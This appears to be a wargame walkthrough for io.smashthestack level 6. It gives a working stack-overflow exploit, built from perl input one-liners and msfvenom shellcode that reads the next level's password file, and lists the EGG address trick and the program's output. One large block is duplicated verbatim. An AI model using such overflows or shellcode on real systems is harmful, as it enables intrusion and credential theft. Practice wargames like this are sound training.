Level 6 from io.smashthestack.org:
Input templates:
first: AAAAAAAAAAAAAAAAAAAA (20 + \n)
last: BBBBBBBBBBBBBBCCCCC (19 + \n)
If input is greater than 20, the strncpy() in prompt_name() will truncate the string and it won't slap on a \0.
In prompt_full_name(), after reading both prompts, first = first + last, so the first strcpy() will copy 39 bytes into full name, plus 1 space, then 19 more bytes from the second strcpy() (enough to overwrite EIP).
Note: Need to fill the first read()'s buffer completely, else the second read() will pick up where it left off, mucking things up. New input template:
perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x01\x02\x03\x04C\n"' > in
Put shellcode into EGG environment variable, shellcode was very picky (no actual shells allowed):
level6@io:/tmp/dennis6$ cat sc.pl
my $nops = "\x90" x 50;
#dennis@ipa:~/msf3$ ./msfvenom -p linux/x86/exec -f pl -b '\x00' CMD='cat /home/level7/.pass'
#[*] x86/shikata_ga_nai succeeded with size 85 (iteration=1)
my $sc =
"\xdb\xd3\xd9\x74\x24\xf4\xbb\xc6\x34\x4f\xa3\x58\x29\xc9" .
"\xb1\x0f\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\x24\xc1\x25" .
"\xa8\xf0\xb3\xe8\xc8\x68\xe9\x6f\x9c\x8f\x99\x40\xed\x27" .
"\x5a\xf7\x3e\xd5\x33\x69\xc8\xfa\x96\x9d\xdd\xfc\x16\x5e" .
"\x81\x9d\x62\x7e\x6a\x35\xe4\x13\x11\xea\x96\x8e\xaf\x91" .
"\x0a\x66\x7f\x77\xa3\xe9\x0c\xf4\x43\xbd\xa1\x73\xa2\x8c" .
"\xc6";
print $nops.$sc
level6@io:/tmp/dennis6$ export EGG=`perl sc.pl`
Input templates:
first: AAAAAAAAAAAAAAAAAAAA (20 + \n)
last: BBBBBBBBBBBBBBCCCCC (19 + \n)
If input is greater than 20, the strncpy() in prompt_name() will truncate the string and it won't slap on a \0.
In prompt_full_name(), after reading both prompts, first = first + last, so the first strcpy() will copy 39 bytes into full name, plus 1 space, then 19 more bytes from the second strcpy() (enough to overwrite EIP).
Note: Need to fill the first read()'s buffer completely, else the second read() will pick up where it left off, mucking things up. New input template:
perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x01\x02\x03\x04C\n"' > in
Put shellcode into EGG environment variable, shellcode was very picky (no actual shells allowed):
level6@io:/tmp/dennis6$ cat sc.pl
my $nops = "\x90" x 50;
#dennis@ipa:~/msf3$ ./msfvenom -p linux/x86/exec -f pl -b '\x00' CMD='cat /home/level7/.pass'
#[*] x86/shikata_ga_nai succeeded with size 85 (iteration=1)
my $sc =
"\xdb\xd3\xd9\x74\x24\xf4\xbb\xc6\x34\x4f\xa3\x58\x29\xc9" .
"\xb1\x0f\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\x24\xc1\x25" .
"\xa8\xf0\xb3\xe8\xc8\x68\xe9\x6f\x9c\x8f\x99\x40\xed\x27" .
"\x5a\xf7\x3e\xd5\x33\x69\xc8\xfa\x96\x9d\xdd\xfc\x16\x5e" .
"\x81\x9d\x62\x7e\x6a\x35\xe4\x13\x11\xea\x96\x8e\xaf\x91" .
"\x0a\x66\x7f\x77\xa3\xe9\x0c\xf4\x43\xbd\xa1\x73\xa2\x8c" .
"\xc6";
print $nops.$sc
level6@io:/tmp/dennis6$ export EGG=`perl sc.pl`
Get address of the EGG environment variable:
level6@io:/tmp/dennis6$ cat le.c
#include
/* progname must be the same length as /levels/level06 */
int main()
{
char *envaddr;
envaddr = getenv("EGG");
printf("EGG is at %p\n", envaddr);
}
>>> len("/levels/level06")
15
>>> len("/tmp/dennis6/le")
15
level6@io:/tmp/dennis6$ ./le
EGG is at 0xbffffe97
Adjust the input template with return address:
level6@io:/tmp/dennis6$ perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x97\xfe\xff\xbfC\n"' > exp
level6@io:/tmp/dennis6$ /levels/level06 < exp
Please enter your first name:
Please enter your last name:
Welcome, AAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBB???C BBBBBBBBBBBBBB???C
shhh don't snitch
Can you please explain why the 4705 bytes of padding is required when the arguments are passed from file and not when passed through command-line?
ReplyDelete